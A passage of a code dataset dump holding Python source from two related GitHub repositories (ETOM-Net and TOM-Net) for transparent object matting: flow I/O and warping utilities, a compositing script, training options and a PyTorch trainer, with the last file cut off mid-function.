metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "1asso/ETOM-Net",
"score": 2
} |
#### File: 1asso/ETOM-Net/utility.py
```python
from models.CoarseNet import CreateOutput
import os
import torch
from torch import Tensor
import math
import logging
from torchvision import transforms
from torchvision.utils import save_image
import struct
import torch.nn as nn
import torch.nn.functional as F
import math
from pathlib import Path
from skimage.color import hsv2rgb
from typing import Type, Any, Callable, Union, List, Optional, Dict
TAG = 202021.25
### IO utilities
def load_data(f_name: str) -> "model":
data = {}
if os.path.isfile(f_name):
data = torch.load(f_name)
return data
def resize_tensor(input_tensor: Tensor, h: int, w: int) -> Tensor:
final_output = None
for img in input_tensor:
img_PIL = transforms.ToPILImage()(img)
img_PIL = transforms.Resize([h, w])(img_PIL)
img_PIL = transforms.ToTensor()(img_PIL)
if final_output is None:
final_output = img_PIL
else:
final_output = torch.cat((final_output, img_PIL), 0)
return final_output
def save_compact_results(save_name: str, results: List[Tensor], width_num: int) -> None:
_int = 5
num = len(results)
w_n = width_num or 3
h_n = math.ceil(num / w_n)
idx = 1
big_img = None
fix_h = fix_w = None
h = w = None
for v in results:
if not type(v) == bool:
img = v.float()
if img.dim() > 3 or img.dim() < 2:
logging.error('Dim of image must be 2 or 3')
if big_img == None:
c, h, w = list(img.size())
fix_h = h
fix_w = w
big_img = torch.Tensor(3, h_n*h + (h_n-1)*_int,
w_n*w + (w_n-1)*_int).fill_(0)
if img.size(0) != 3:
img = img.unsqueeze(0)
img = img.repeat(3, 1, 1)
if img.size(1) != fix_h or img.size(2) != fix_w:
img = resize_tensor(img, fix_h, fix_w)
h_idx = math.floor((idx-1) / w_n) + 1
w_idx = (idx-1) % w_n + 1
h_start = (h_idx-1) * (h+_int)
w_start = (w_idx-1) * (w+_int)
big_img[:, h_start:h_start+h, w_start:w_start+w] = img
idx += 1
path = Path(save_name)
if not os.path.exists(path.parent):
os.makedirs(path.parent)
save_image(big_img, save_name)
### flow utilities
def flow_to_color(flow: Tensor) -> Tensor:
flow = flow.float()
if flow.size(0) == 3:
f_val = flow[2, :, :].ge(0.1).float()
else:
f_val = torch.ones(flow.size(1), flow.size(2)).cuda()
f_du = flow[1, :, :].clone()
f_dv = flow[0, :, :].clone()
f_mag = torch.sqrt(torch.pow(f_du, 2) + torch.pow(f_dv, 2))
f_dir = torch.atan2(f_dv, f_du)
img = flow_mapping(f_mag, f_dir, f_val)
return img
def flow_mapping(f_mag: Tensor, f_dir: Tensor, f_val: Tensor) -> Tensor:
img_size = f_mag.size()
img = torch.zeros(3, img_size[0], img_size[1]).cuda()
img[0, :, :] = (f_dir + math.pi) / (2 * math.pi)
img[1, :, :] = torch.div(f_mag, (f_mag.size(1) * 0.5)).clamp(0, 1)
img[2, :, :] = 1
img[1:2, :, :] = torch.minimum(torch.maximum(img[1:2, :, :], torch.zeros(img_size).cuda()), torch.ones(img_size).cuda())
img = torch.from_numpy(hsv2rgb(img.cpu().permute(1,2,0).detach())).cuda().permute(2,0,1)
img[0, :, :] = img[0, :, :] * f_val
img[1, :, :] = img[1, :, :] * f_val
img[2, :, :] = img[2, :, :] * f_val
return img
def load_flow(filename: str) -> Tensor:
f = open(filename, 'rb')
tag = struct.unpack('f', f.read(4))[0]
assert tag == TAG, 'Unable to read ' + filename + ' because of wrong tag'
w = struct.unpack('i', f.read(4))[0]
h = struct.unpack('i', f.read(4))[0]
channels = 2
l = [] # in file: [h, w, c]
for i, val in enumerate(struct.iter_unpack('h', f.read())):
if not i % 2:
l.append([])
l[int(i/2)].append(val[0])
flow = torch.ShortTensor(l).reshape(h, w, channels)
f.close()
flow = flow.permute(2, 0, 1).float() # output: [c, h, w]
return flow
def save_flow(filename: str, flow: Tensor) -> None:
flow = flow.short().permute(1, 2, 0).clone()
f = open(filename, 'wb')
f.write(struct.pack('f', TAG))
f.write(struct.pack('i', flow.size(1)))
f.write(struct.pack('i', flow.size(0)))
for val in flow.reshape([flow.numel()]).tolist():
f.write(struct.pack('h', val))
f.close()
### dict utilities
def build_loss_string(losses: dict) -> str:
total_loss = 0
s = ''
count = 0
for k, v in losses.items():
count += 1
s += f'{k}: {v}'
if not count % 4:
s += '\n'
elif count != 16:
s += ', '
total_loss += v
s += f'[Total Loss: {total_loss}]'
return s
def dicts_add(dict_ori: dict, dict_to_add: dict) -> None:
for k, v in dict_to_add.items():
if not k in dict_ori.keys():
dict_ori[k] = 0
dict_ori[k] = dict_ori[k] + v
def dict_of_dict_average(dict_of_dict: Dict[str, Dict[str, float]]) -> Dict[str, float]:
result = {}
for k1, v1 in dict_of_dict.items():
for k2, v2 in v1.items():
if not k2 in result.keys():
result[k2] = 0
result[k2] = result[k2] + v2
n = len(dict_of_dict)
for k, v in result.items():
result[k] /= n
return result
def dict_divide(dict_ori: dict, n: int) -> dict:
return {k: v / n for k, v in dict_ori.items()}
def hist_to_str(d: dict):
s = ''
for k, v in d.items():
s += f'Epoch: {k}\n{v}\n\n'
return s
### model utilities
class CreateMultiScaleData(nn.Module):
def __init__(self, ms_num: int) -> None:
super(CreateMultiScaleData, self).__init__()
self.ms_num = ms_num
def forward(self, x: List[Tensor]) -> List[List[Tensor]]:
result = [[],[],[],[],[]]
for i in range(self.ms_num, 0, -1):
scale = 2**(i-1)
result[0].append(nn.AvgPool2d((scale, scale))(x[0]))
result[1].append(nn.AvgPool2d((scale, scale))(x[1]))
result[2].append(nn.AvgPool2d((scale, scale))(x[2]))
result[3].append(nn.MaxPool2d((scale, scale))(x[3]))
result[4].append(nn.AvgPool2d((scale, scale))(x[4]).mul(1/scale))
return result
class CreateMultiScaleWarping(nn.Module):
def __init__(self, ms_num: int) -> None:
super(CreateMultiScaleWarping, self).__init__()
self.ms_num = ms_num
def forward(self, x: List[List[Tensor]]) -> List[Tensor]:
warping_module = []
for i in range(self.ms_num):
input_0 = x[0][i] # multi_ref_images
input_1 = x[1][i] # flows
single_warping = create_single_warping([input_0, input_1])
warping_module.append(single_warping)
return warping_module
def create_single_warping(input: List[Tensor]) -> Tensor:
ref = input[0]
flo = input[1]
grid = grid_generator(flo)
output = F.grid_sample(ref, grid, align_corners=True)
return output
def grid_generator(flow: Tensor) -> Tensor:
B, C, H, W = flow.size()
# mesh grid
xx = torch.arange(0, W).view(1,-1).repeat(H,1)
yy = torch.arange(0, H).view(-1,1).repeat(1,W)
xx = xx.view(1,1,H,W).repeat(B,1,1,1)
yy = yy.view(1,1,H,W).repeat(B,1,1,1)
grid = torch.cat((xx,yy),1).float().cuda()
flow = flow.div(H/2)
flow_clo = flow.clone()
flow[:,0,:,:] = flow_clo[:,1,:,:]
flow[:,1,:,:] = flow_clo[:,0,:,:]
# scale grid to [-1,1]
grid[:,0,:,:] = 2.0*grid[:,0,:,:].clone() / max(W-1,1)-1.0
grid[:,1,:,:] = 2.0*grid[:,1,:,:].clone() / max(H-1,1)-1.0
grid = grid + flow
grid = grid.permute(0,2,3,1)
return grid
### evaluation utilities
class EPELoss(nn.Module):
def __init__(self) -> None:
super(EPELoss, self).__init__()
def forward(self, pred: Tensor, target: Tensor, mask: Tensor, rho: Tensor) -> Tensor:
target = target.narrow(1, 0, 2)
mask = mask.expand_as(target)
pred = pred * mask * rho.gt(0.2) * rho
target = target * mask * rho.gt(0.2) * rho
return torch.norm(target-pred, dim=1).mean()
def get_final_pred(ref_img: Tensor, pred_img: Tensor, pred_mask: Tensor, pred_rho: Tensor) -> Tensor:
final_pred_img = torch.mul(1 - pred_mask, ref_img) + torch.mul(pred_mask, torch.mul(pred_img, pred_rho))
return final_pred_img
def get_mask(masks: Tensor) -> Tensor:
n, c, h, w = list(masks.size())
m = masks.transpose(1, 3).transpose(1,2)
m = m.reshape(int(m.numel()/m.size(3)), m.size(3))
_, pred = m.max(1)
pred = pred.reshape(n, 1, h, w)
return pred
``` |
{
"source": "1asso/TOM-Net",
"score": 2
} |
#### File: TOM-Net/eval/composite.py
```python
from torchvision.utils import save_image
import torch
import glob
import os
import struct
from PIL import Image
import torchvision.transforms.functional as TF
import torch.nn.functional as F
root_dir = ''
def load_flow(filename):
f = open(filename, 'rb')
tag = struct.unpack('f', f.read(4))[0]
w = struct.unpack('i', f.read(4))[0]
h = struct.unpack('i', f.read(4))[0]
channels = 2
l = [] # in file: [h, w, c]
for i, val in enumerate(struct.iter_unpack('h', f.read())):
if not i % 2:
l.append([])
l[int(i/2)].append(val[0])
flow = torch.ShortTensor(l).reshape(h, w, channels)
f.close()
flow = flow.permute(2, 0, 1).float() # output: [c, h, w]
return flow
def create_single_warping(input):
ref = input[0]
flo = input[1]
grid = grid_generator(flo)
output = F.grid_sample(ref, grid, align_corners=True)
return output
def grid_generator(flow):
B, C, H, W = flow.size()
# mesh grid
xx = torch.arange(0, W).view(1,-1).repeat(H,1)
yy = torch.arange(0, H).view(-1,1).repeat(1,W)
xx = xx.view(1,1,H,W).repeat(B,1,1,1)
yy = yy.view(1,1,H,W).repeat(B,1,1,1)
grid = torch.cat((xx,yy),1).float()
flow = 2.0 * flow.div(H)
flow_clo = flow.clone()
flow[:,0,:,:] = flow_clo[:,1,:,:]
flow[:,1,:,:] = flow_clo[:,0,:,:]
# scale grid to [-1,1]
grid[:,0,:,:] = 2.0*grid[:,0,:,:].clone() / max(W-1,1)-1.0
grid[:,1,:,:] = 2.0*grid[:,1,:,:].clone() / max(H-1,1)-1.0
grid = grid + flow
grid = grid.permute(0,2,3,1)
return grid
def get_final_pred(ref_img, pred_img, pred_mask, pred_rho):
final_pred_img = torch.mul(1 - pred_mask, ref_img) + torch.mul(pred_mask, torch.mul(pred_img, pred_rho))
return final_pred_img
bg = glob.glob(os.path.join(root_dir, '*bg.png'))[0]
bg = Image.open(bg)
bg = TF.to_tensor(bg)
mask = glob.glob(os.path.join(root_dir, '*mask.png'))[0]
mask = Image.open(mask)
mask = TF.to_tensor(mask.convert('L'))
mask.apply_(lambda x: 1 if x else 0)
rho = glob.glob(os.path.join(root_dir, '*rho.png'))[0]
rho = Image.open(rho)
rho = TF.to_tensor(rho.convert('L'))
flow = glob.glob(os.path.join(root_dir, '*flow.png'))[0]
flow = load_flow(flow)
pred = create_single_warping([bg.unsqueeze(0), flow.unsqueeze(0)])
final = get_final_pred(bg, pred, mask, rho)
save_image(final, root_dir + 'rec.png')
print('done')
```
#### File: 1asso/TOM-Net/option.py
```python
import os
import argparse
import numpy as np
from typing import Tuple
import torch
import datetime
def get_save_dir_name(args: argparse.Namespace) -> Tuple[str, str]:
now = datetime.datetime.now()
date = now.strftime("%Y-%m-%d")
time = now.strftime("%H:%M:%S")
d_name = date + '_' + (args.refine and 'RefineNet' or 'CoarseNet')
params = ['flow_w', 'mask_w', 'rho_w', 'img_w', 'lr'] if not args.refine else ['r_flow_w', 'r_mask_w', 'lr_r']
for p in params:
d_name = d_name + '_' + p + '-' + str(vars(args)[p])
d_name = d_name + ('_retrain' if args.retrain != None else '')
d_name = d_name + ('_resume' if args.resume != None else '')
d_name = d_name + ('_valOnly' if args.val_only else '')
log_dir = os.path.join('data/training', d_name, 'logdir')
save = os.path.join('data/training', d_name, 'checkpointdir')
return log_dir, save
parser = argparse.ArgumentParser(description='ETOM-Net')
# dataset options
parser.add_argument('--dataset', type=str, default='TOMDataset',
help='dataset name')
parser.add_argument('--data_dir', type=str, default='../TOM-Net_Synth_Train_178k',
help='training dataset path')
parser.add_argument('--train_list', type=str, default='train_60k.txt',
help='train list')
parser.add_argument('--val_list', type=str, default='val_400.txt',
help='val list')
parser.add_argument('--data_aug', type=bool, default=True,
help='data augmentation')
parser.add_argument('--noise', type=float, default=0.05,
help='noise level')
parser.add_argument('--rot_ang', type=float, default=0.3,
help='angle for rotating data')
parser.add_argument('--max_train_num', type=int, default=-1,
help='>0 for max number')
parser.add_argument('--max_val_num', type=int, default=-1,
help='>0 for max number')
# training options
parser.add_argument('--start_epoch', type=int, default=0,
help='set start epoch for restart')
parser.add_argument('--n_epochs', type=int, default=30,
help='number of total epochs to run')
parser.add_argument('--ga', type=int, default=1,
help='gradient accumulations')
parser.add_argument('--batch_size', type=int, default=8,
help='mini-batch size')
parser.add_argument('--lr', type=float, default=0.0005,
help='initial learning rate')
parser.add_argument('--lr_r', type=float, default=0.0002,
help='initial learning rate')
parser.add_argument('--lr_decay_start', type=int, default=5,
help='number of epochs when lr start to decay')
parser.add_argument('--lr_decay_step', type=int, default=5,
help='step for the lr decay')
parser.add_argument('--solver', type=str, default='ADAM',
help='solver used(Adam only)')
parser.add_argument('--beta_1', type=float, default=0.9,
help='first param of Adam optimizer')
parser.add_argument('--beta_2', type=float, default=0.999,
help='second param of Adam optimizer')
# network options
parser.add_argument('--ms_num', type=int, default=4,
help='multiscale level')
parser.add_argument('--refine', action='store_true',
help='train refine net')
parser.add_argument('--pred_dir', type=str, default='coarse.pt',
help='predictor path')
parser.add_argument('--refine_dir', type=str, default='refine.pt',
help='predictor path')
parser.add_argument('--val_only', action='store_true',
help='run on validation set only')
parser.add_argument('--save_images', action='store_true',
help='save test results')
# checkpoint options
parser.add_argument('--resume', type=str, default=None,
help='reload checkpoint and state')
parser.add_argument('--retrain', type=str, default=None,
help='reload checkpoint only')
parser.add_argument('--save_interval', type=int, default=1,
help='epochs to save checkpoint(overwrite)')
parser.add_argument('--save_new', type=int, default=1,
help='epochs to save new checkpoint')
# loss options
parser.add_argument('--flow_w', type=float, default=0.1,
help='flow weight')
parser.add_argument('--img_w', type=int, default=10,
help='image reconstruction weight')
parser.add_argument('--mask_w', type=float, default=1,
help='mask weight')
parser.add_argument('--rho_w', type=int, default=10,
help='attenuation mask weight')
parser.add_argument('--r_flow_w', type=float, default=1,
help='flow weight')
parser.add_argument('--r_mask_w', type=float, default=10,
help='mask weight')
# display options
parser.add_argument('--train_display', type=int, default=20,
help='iteration to display train loss')
parser.add_argument('--train_save', type=int, default=200,
help='iteration to save train results')
parser.add_argument('--val_interval', type=int, default=1,
help='epoch to do validation')
parser.add_argument('--val_display', type=int, default=1,
help='iteration to display val loss')
parser.add_argument('--val_save', type=int, default=1,
help='iteration to save val results')
args = parser.parse_args()
args.batch_size *= torch.cuda.device_count()
if args.refine:
args.batch_size = int(args.batch_size / 2)
print("\n\n --> Let's use", torch.cuda.device_count(), "GPUs!")
args.log_dir, args.save = get_save_dir_name(args)
if not os.path.isdir(args.log_dir):
os.makedirs(args.log_dir)
if not os.path.isdir(args.save):
os.makedirs(args.save)
```
#### File: 1asso/TOM-Net/train.py
```python
import torch
import utility
import logging
import os
import torch.nn as nn
from torch import Tensor
from typing import Type, Any, Callable, Union, List, Optional
from torch.utils.data import DataLoader
from models import CoarseNet, RefineNet
from argparse import Namespace
from checkpoint import CheckPoint
import torch.nn.functional as F
from torch.optim.lr_scheduler import StepLR
from torchvision.utils import save_image
class Trainer:
def __init__(self, model: Union[CoarseNet.CoarseNet, RefineNet.RefineNet],
opt: Namespace, optim_state: Optional[dict]) -> None:
print('\n\n --> Initializing Trainer')
self.opt = opt
self.model = model.cuda()
self.warping_module = self.setup_warping_module()
self.multi_scale_data = self.setup_ms_data_module()
self.optim_state = self.setup_solver(optim_state)
self.setup_criterions()
self.optimizer = torch.optim.Adam(self.model.parameters(), **(self.optim_state), \
weight_decay=0.01)
self.scheduler = StepLR(self.optimizer, step_size=5, gamma=0.5)
print('\n\n --> Total number of parameters in ETOM-Net: ' + str(sum(p.numel() for p in self.model.parameters())))
self.input_image = None
self.ref_images = None
self.tar_images = None
self.rhos = None
self.masks = None
self.flows = None
def setup_ms_data_module(self) -> utility.CreateMultiScaleData:
print('[Multi Scale] Setting up multi scale data module')
ms_data_module = utility.CreateMultiScaleData(self.opt.ms_num)
return ms_data_module
def setup_warping_module(self) -> utility.CreateMultiScaleWarping:
print('[Multi Scale] Setting up multi scale warping')
warping_module = utility.CreateMultiScaleWarping(self.opt.ms_num)
return warping_module
def setup_criterions(self) -> None:
print('\n\n --> Setting up criterion')
print('[Flow Loss] Setting up EPELoss for flow')
self.flow_criterion = utility.EPELoss
print('[Rec Loss] Setting up MSELoss for reconstructed image')
self.rec_criterion = nn.MSELoss
print('[Mask Loss] Setting up CrossENtropyLoss for mask')
self.mask_criterion = nn.CrossEntropyLoss
print('[Rho Loss] Setting up MSELoss for rho')
self.rho_criterion = nn.MSELoss
def setup_solver(self, in_optim_state: dict) -> dict:
optim_state = None
if self.opt.solver == 'ADAM':
print('[Solver] Using Adam solver')
optim_state = in_optim_state or {
'lr': self.opt.lr_r if self.opt.refine else self.opt.lr,
'betas': (self.opt.beta_1, self.opt.beta_2)
}
else:
logging.warning('Unknown optimization method')
return optim_state
def train(self, epoch: int, dataloader: DataLoader, split: str) -> float:
gradient_accumulations = self.opt.ga
num_batches = len(dataloader)
print('\n====================')
print(self.optim_state)
print(f'Training epoch # {epoch+1}, totaling mini batches {num_batches}')
print('====================\n')
self.model.train()
loss_iter = {} # loss every n iterations
loss_epoch = {} # loss of the entire epoch
eps = 1e-7
# Zero gradients
self.optimizer.zero_grad()
if self.opt.refine:
loss_iter['mask'] = 0
loss_iter['flow'] = 0
for iter, sample in enumerate(dataloader):
input = self.setup_inputs(sample)
torch.cuda.empty_cache()
torch.autograd.set_detect_anomaly(True)
output = self.model.forward(input)
pred_images = self.single_flow_warping(output) # warp input image with flow
flow_loss = self.opt.r_flow_w * self.flow_criterion()(output[0], self.flows, \
self.masks.unsqueeze(1), self.rhos.unsqueeze(1))
mask_loss = self.opt.r_mask_w * self.mask_criterion()(output[1] + eps, self.masks.squeeze(1).long())
loss = flow_loss + mask_loss
loss_iter['mask'] += mask_loss.item()
loss_iter['flow'] += flow_loss.item()
# Perform a backward pass
(loss / gradient_accumulations).backward()
# Update the weights
if (iter + 1) % gradient_accumulations == 0:
self.optimizer.step()
self.optimizer.zero_grad()
if (iter+1) % self.opt.train_display == 0:
loss_epoch[iter] = self.display(epoch+1, iter+1, num_batches, loss_iter, split)
loss_iter['mask'] = 0
loss_iter['flow'] = 0
if (iter+1) % self.opt.train_save == 0:
self.save_results(epoch+1, iter+1, output, pred_images, split, 0)
else:
for i in range(self.opt.ms_num):
loss_iter[f'Scale {i} mask'] = 0
loss_iter[f'Scale {i} rho'] = 0
loss_iter[f'Scale {i} flow'] = 0
loss_iter[f'Scale {i} rec'] = 0
for iter, sample in enumerate(dataloader):
input = self.setup_inputs(sample)
torch.cuda.empty_cache()
torch.autograd.set_detect_anomaly(True)
output = self.model.forward(input)
pred_images = self.flow_warping(output) # warp input image with flow
loss = None
for i in range(self.opt.ms_num):
mask_loss = self.opt.mask_w * self.mask_criterion()(output[i][1] + eps, \
self.multi_masks[i].squeeze(1).long()) * (1 / 2 ** (self.opt.ms_num - i - 1))
rho_loss = self.opt.rho_w * self.rho_criterion()(output[i][2], \
self.multi_rhos[i]) * (1 / 2 ** (self.opt.ms_num - i - 1))
flow_loss = self.opt.flow_w * self.flow_criterion()(output[i][0], \
self.multi_flows[i], self.multi_masks[i], self.multi_rhos[i]) * (1 / 2 ** (self.opt.ms_num - i - 1))
mask = utility.get_mask(output[i][1]).expand(output[i][1].size(0), \
3, output[i][1].size(2), output[i][1].size(3))
final_pred = utility.get_final_pred(self.multi_ref_images[i], \
pred_images[i], mask, output[i][2])
rec_loss = self.opt.img_w * self.rec_criterion()(final_pred, \
self.multi_tar_images[i]) * (1 / 2 ** (self.opt.ms_num - i - 1))
if i == 0:
loss = mask_loss + rho_loss + flow_loss + rec_loss
else:
loss += mask_loss + rho_loss + flow_loss + rec_loss
loss_iter[f'Scale {i} mask'] += mask_loss.item()
loss_iter[f'Scale {i} rho'] += rho_loss.item()
loss_iter[f'Scale {i} flow'] += flow_loss.item()
loss_iter[f'Scale {i} rec'] += rec_loss.item()
# Perform a backward pass
(loss / gradient_accumulations).backward()
# Update the weights
if (iter + 1) % gradient_accumulations == 0:
self.optimizer.step()
self.optimizer.zero_grad()
if (iter+1) % self.opt.train_display == 0:
loss_epoch[iter] = self.display(epoch+1, iter+1, num_batches, loss_iter, split)
for i in range(self.opt.ms_num):
loss_iter[f'Scale {i} mask'] = 0
loss_iter[f'Scale {i} rho'] = 0
loss_iter[f'Scale {i} flow'] = 0
loss_iter[f'Scale {i} rec'] = 0
if (iter+1) % self.opt.train_save == 0:
self.save_ms_results(epoch+1, iter+1, output, pred_images, split, 0)
average_loss = utility.build_loss_string(utility.dict_of_dict_average(loss_epoch))
print(f'\n\n --> Epoch: [{epoch+1}] Loss summary: \n{average_loss}')
self.scheduler.step()
self.optim_state['lr'] = self.optimizer.param_groups[0]['lr']
return average_loss
def get_saving_name(self, log_dir: str, split: str, epoch: int, iter: int, id: int) -> str:
f_path = f'{log_dir}/{split}/Images/'
f_names = f'epoch:{epoch}_iter:{iter}_id:{id}'
return os.path.join(f_path, f_names + '.png')
def save_images(self, pred_images: Tensor, output: List[Tensor], count: int) -> int:
for i in range(pred_images.size()[0]):
print(count)
os.makedirs(f'results/{count}')
mask = torch.squeeze(utility.get_mask(output[1][i].unsqueeze(0))).expand(3, output[1].size(2), output[1].size(3))
rho = output[2][i].repeat(3, 1, 1)
final_img = utility.get_final_pred(self.ref_images[i], pred_images[i], mask, rho)
save_image(final_img, f'results/{count}/in_rec.png')
save_image(mask.float(), f'results/{count}/mask.png')
save_image(rho, f'results/{count}/rho.png')
utility.save_flow(f'results/{count}/flow.flo', output[0][i])
save_image(self.ref_images[i], f'results/{count}/bg.png')
save_image(self.masks[i], f'results/{count}/mask_gt.png')
save_image(self.rhos[i], f'results/{count}/rho_gt.png')
save_image(self.input_image[i], f'results/{count}/input.png')
save_image(self.tar_images[i], f'results/{count}/tar.png')
utility.save_flow(f'results/{count}/flow_gt.flo', self.flows[i][0:2, :, :])
save_image(utility.flow_to_color(torch.mul(output[0][i], self.masks[i])), f'results/{count}/fcolor.png')
save_image(utility.flow_to_color(self.flows[i]), f'results/{count}/fcolor_gt.png')
count += 1
return count
def get_predicts(self, id: int, output: List[Tensor], pred_img: Tensor, m_scale: int) -> List[Tensor]:
pred = []
if m_scale != None:
gt_color_flow = utility.flow_to_color(self.multi_flows[m_scale][id])
else:
gt_color_flow = utility.flow_to_color(self.flows[id])
pred.append(gt_color_flow)
color_flow = utility.flow_to_color(output[0][id])
pred.append(color_flow)
mask = torch.squeeze(utility.get_mask(output[1][id].unsqueeze(0))).expand(3, output[1].size(2), output[1].size(3))
pred.append(mask)
rho = output[2][id].repeat(3, 1, 1)
pred.append(rho)
if m_scale != None:
final_img = utility.get_final_pred(self.multi_ref_images[m_scale][id], pred_img[id], mask, rho)
first_img = self.multi_tar_images[m_scale][id]
else:
final_img = utility.get_final_pred(self.ref_images[id], pred_img[id], mask, rho)
first_img = self.tar_images[id]
pred.insert(0, first_img)
pred.insert(1, final_img)
return pred
def get_first_row(self, id: int) -> List[Union[bool, Tensor]]:
first = []
first.append(self.ref_images[id])
first.append(self.tar_images[id])
first.append(False)
first.append(False)
first.append(self.masks[id])
first.append(self.rhos[id])
return first
def save_ms_results(
self,
epoch: int,
iter: int,
output: List[List[Tensor]],
multi_pred_img: List[List[Tensor]],
split: str,
id: int
) -> None:
id = id or 0
scales = self.opt.ms_num
results = []
first_row = self.get_first_row(id)
for val in first_row:
results.append(val)
for i in range(scales-1, -1, -1):
sub_pred = self.get_predicts(id, output[i], multi_pred_img[i], i)
for val in sub_pred:
results.append(val)
save_name = self.get_saving_name(self.opt.log_dir, split, epoch, iter, id)
utility.save_compact_results(save_name, results, 6)
print('\n\n --> Flow magnitude: Max {}, Min {}, Mean {}'.format(
torch.max(output[scales-1][0][id]), torch.min(output[scales-1][0][id]),
torch.mean(torch.abs(output[scales-1][0][id]))))
def save_results(
self,
epoch: int,
iter: int,
output: List[Tensor],
pred_img: Tensor,
split: str,
id: int
) -> None:
id = id or 0
results = []
first_row = self.get_first_row(id)
for val in first_row:
results.append(val)
sub_pred = self.get_predicts(id, output, pred_img, None)
for val in sub_pred:
results.append(val)
save_name = self.get_saving_name(self.opt.log_dir, split, epoch, iter, id)
utility.save_compact_results(save_name, results, 6)
def flow_warping(self, output: List[List[Tensor]]) -> List[Tensor]:
flows = []
for i in range(self.opt.ms_num):
flows.append(output[i][0])
pred_images= self.warping_module([self.multi_ref_images, flows])
return pred_images
def single_flow_warping(self, output: List[Tensor]) -> Tensor:
pred_images= utility.create_single_warping([self.ref_images, output[0]])
return pred_images
def test(self, epoch: int, dataloader: DataLoader, split: str) -> float:
num_batches = len(dataloader)
loss_iter = {}
loss_epoch = {}
print(f'\n\n===== Testing after {epoch+1} epochs =====')
self.model.eval()
rec_err = 0
rho_err = 0
flow_err = 0
mask_err = 0
size = 400
def iou(pred, tar):
intersection = torch.logical_and(tar, pred)
union = torch.logical_or(tar, pred)
iou_score = torch.true_divide(torch.sum(intersection), torch.sum(union))
return iou_score
def epe(mask_gt, flow_gt, flow):
mask_gt = mask_gt.expand_as(flow_gt)
flow = flow * mask_gt
flow_gt = flow_gt * mask_gt
return torch.norm(flow_gt-flow, dim=1).mean() / 100
if self.opt.refine:
loss_iter['mask'] = 0
loss_iter['flow'] = 0
count = 1
for iter, sample in enumerate(dataloader):
with torch.no_grad():
input = self.setup_inputs(sample)
torch.cuda.empty_cache()
torch.autograd.set_detect_anomaly(True)
output = self.model.forward(input)
pred_images = self.single_flow_warping(output) # warp input image with flow
if self.opt.save_images:
count = self.save_images(pred_images, output, count)
for i in range(output[0].size(0)):
mask = torch.squeeze(utility.get_mask(output[1][i].unsqueeze(0))).expand(3, \
output[1][i].size(1), output[1][i].size(2))
final_pred = utility.get_final_pred(self.ref_images[i], \
pred_images[i], mask, output[2][i])
rec_err += 100 * F.mse_loss(final_pred, self.tar_images[i])
rho_err += 100 * F.mse_loss(output[2][i], self.rhos[i])
flow_err += epe(self.masks[i], self.flows[i][0:2, :, :] * \
self.rhos[i], output[0][i] * self.rhos[i])
mask_err += iou(mask, self.masks[i])
flow_loss = self.opt.r_flow_w * self.flow_criterion()(output[0], self.flows, \
self.masks.unsqueeze(1), self.rhos.unsqueeze(1))
mask_loss = self.opt.r_mask_w * self.mask_criterion()(output[1], self.masks.squeeze(1).long())
loss_iter['mask'] += mask_loss.item()
loss_iter['flow'] += flow_loss.item()
if (iter+1) % self.opt.val_display == 0:
loss_epoch[iter] = self.display(epoch+1, iter+1, num_batches, loss_iter, split)
loss_iter['mask'] = 0
loss_iter['flow'] = 0
if (iter+1) % self.opt.val_save == 0:
self.save_results(epoch+1, iter+1, output, pred_images, split, 0)
else:
for i in range(self.opt.ms_num):
loss_iter[f'Scale {i} mask'] = 0
loss_iter[f'Scale {i} rho'] = 0
loss_iter[f'Scale {i} flow'] = 0
loss_iter[f'Scale {i} rec'] = 0
count = 1
for iter, sample in enumerate(dataloader):
with torch.no_grad():
torch.cuda.empty_cache()
input = self.setup_inputs(sample)
torch.cuda.empty_cache()
torch.autograd.set_detect_anomaly(True)
output = self.model.forward(input)
pred_images = self.flow_warping(output) # warp input image with flow
if self.opt.save_images:
count = self.save_images(pred_images[-1], output[-1], count)
loss = None
for i in range(output[-1][0].size(0)):
mask = torch.squeeze(utility.get_mask(output[-1][1][i].unsqueeze(0))).expand(3, \
output[-1][1][i].size(1), output[-1][1][i].size(2))
final_pred = utility.get_final_pred(self.multi_ref_images[-1][i], \
pred_images[-1][i], mask, output[-1][2][i])
rec_err += 100 * F.mse_loss(final_pred, self.multi_tar_images[-1][i])
rho_err += 100 * F.mse_loss(output[-1][2][i], self.multi_rhos[-1][i])
flow_err += epe(self.multi_masks[-1][i], self.multi_flows[-1][i][0:2, :, :] * \
self.multi_rhos[-1][i], output[-1][0][i] * self.multi_rhos[-1][i])
mask_err += iou(mask, self.multi_masks[-1][i])
for i in range(self.opt.ms_num):
mask_loss = self.opt.mask_w * self.mask_criterion()(output[i][1], \
self.multi_masks[i].squeeze(1).long()) * (1 / 2 ** (self.opt.ms_num - i - 1))
rho_loss = self.opt.rho_w * self.rho_criterion()(output[i][2], \
self.multi_rhos[i]) * (1 / 2 ** (self.opt.ms_num - i - 1))
flow_loss = self.opt.flow_w * self.flow_criterion()(output[i][0], \
self.multi_flows[i], self.multi_masks[i], self.multi_rhos[i]) * (1 / 2 ** (self.opt.ms_num - i - 1))
mask = utility.get_mask(output[i][1]).expand(output[i][1].size(0), \
3, output[i][1].size(2), output[i][1].size(3))
final_pred = utility.get_final_pred(self.multi_ref_images[i], \
pred_images[i], mask, output[i][2])
rec_loss = self.opt.img_w * self.rec_criterion()(final_pred, \
self.multi_tar_images[i]) * (1 / 2 ** (self.opt.ms_num - i - 1))
loss_iter[f'Scale {i} mask'] += mask_loss.item()
loss_iter[f'Scale {i} rho'] += rho_loss.item()
loss_iter[f'Scale {i} flow'] += flow_loss.item()
loss_iter[f'Scale {i} rec'] += rec_loss.item()
if (iter+1) % self.opt.val_display == 0:
loss_epoch[iter] = self.display(epoch+1, iter+1, num_batches, loss_iter, split)
for i in range(self.opt.ms_num):
loss_iter[f'Scale {i} mask'] = 0
loss_iter[f'Scale {i} rho'] = 0
loss_iter[f'Scale {i} flow'] = 0
loss_iter[f'Scale {i} rec'] = 0
if (iter+1) % self.opt.val_save == 0:
self.save_ms_results(epoch+1, iter+1, output, pred_images, split, 0)
rec_err /= size
rho_err /= size
flow_err /= size
mask_err /= size
eval_str = f'rec_err: {rec_err}\nrho_err: {rho_err}\nflow_err: {flow_err}\nmask_err: {mask_err}\n'
average_loss = utility.build_loss_string(utility.dict_of_dict_average(loss_epoch))
average_loss = eval_str + average_loss
print(f'\n\n --> Epoch: [{epoch+1}] Loss summary: \n{average_loss}')
return average_loss
def display(self, epoch: int, iter: int, num_batches: int, loss: dict, split: str) -> float:
interval = (split == 'train') and self.opt.train_display or self.opt.val_display
average_loss = utility.dict_divide(loss, interval)
